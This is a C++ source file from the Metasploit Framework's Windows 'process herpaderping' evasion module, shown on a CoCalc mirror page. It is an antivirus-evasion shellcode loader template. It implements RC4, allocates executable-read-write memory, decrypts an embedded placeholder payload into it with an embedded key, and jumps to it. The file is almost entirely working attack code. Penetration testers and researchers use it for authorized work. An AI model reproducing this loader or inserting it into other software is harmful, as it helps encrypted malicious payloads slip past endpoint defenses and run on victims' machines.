CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/evasion/windows/process_herpaderping/ProcessHerpaderpingTemplate/ProcessHerpaderpingTemplate.cpp
Views: 11789
1
#define WIN32_LEAN_AND_MEAN

2
#include <Windows.h>

3
#include <memory.h>

4


5
#define N 256   // 2^8

6


7
void swap(unsigned char* a, unsigned char* b) {

8
    int tmp = *a;

9
    *a = *b;

10
    *b = tmp;

11
}

12


13
int KSA(char* key, unsigned char* S) {

14
    size_t len = strlen(key);

15
    int j = 0;

16


17
    for (int i = 0; i < N; i++) {

18
        S[i] = i;

19
    }

20


21
    for (int i = 0; i < N; i++) {

22
        j = (j + S[i] + key[i % len]) % N;

23
        swap(&S[i], &S[j]);

24
    }

25


26
    return 0;

27
}

28


29
int PRGA(unsigned char* S, char* plaintext, unsigned char* ciphertext, int plainTextSize) {

30
    int i = 0;

31
    int j = 0;

32


33
    for (size_t n = 0, len = plainTextSize; n < len; n++) {

34
        i = (i + 1) % N;

35
        j = (j + S[i]) % N;

36
        swap(&S[i], &S[j]);

37
        int rnd = S[(S[i] + S[j]) % N];

38
        ciphertext[n] = rnd ^ plaintext[n];

39
    }

40


41
    return 0;

42
}

43


44
int RC4(char* key, char* plaintext, unsigned char* ciphertext, int plainTextSize) {

45
    unsigned char S[N];

46
    KSA(key, S);

47
    PRGA(S, plaintext, ciphertext, plainTextSize);

48
    return 0;

49
}

50


51
#pragma function(memset)

52
void* __cdecl  memset(_Out_writes_bytes_all_(count) void* dest, _In_ int c, _In_ size_t count) {

53
    unsigned char* p = (unsigned char*)dest;

54
    unsigned char x = c & 0xff;

55


56
    while (count--)

57
        *p++ = x;

58
    return dest;

59
}

60


61
// The future embedded payload will have the following format:

62
// TOTAL_SIZE (uint) + PAYLOAD + JUNK

63
// These constants must match the constants defined in the module

64
#define MAX_PAYLOAD_SIZE 8192

65
#define MAX_JUNK_SIZE 1024

66
#define MAX_KEY_SIZE 64

67


68
static unsigned char payload[sizeof(unsigned int) + MAX_PAYLOAD_SIZE + MAX_JUNK_SIZE] = "PAYLOAD";

69
static unsigned char key[MAX_KEY_SIZE + 1] = "ENCKEY"; // reserve one byte for the terminating NULL character

70


71
int WINAPI WinMainCRTStartup(void)

72
{

73
    unsigned int* lpBufSize = (unsigned int*)payload;

74
    char* payloadValue = (char*)(payload + sizeof(unsigned int));

75
    LPVOID lpBuf = VirtualAlloc(NULL, *lpBufSize, MEM_COMMIT, 0x00000040);

76
    memset(lpBuf, '\0', *lpBufSize);

77


78
    RC4((char *)key, payloadValue, (unsigned char*)lpBuf, *lpBufSize);

79
    void (*func)();

80
    func = (void (*)()) lpBuf;

81
    (void)(*func)();

82


83
    return 0;

84
}

85


86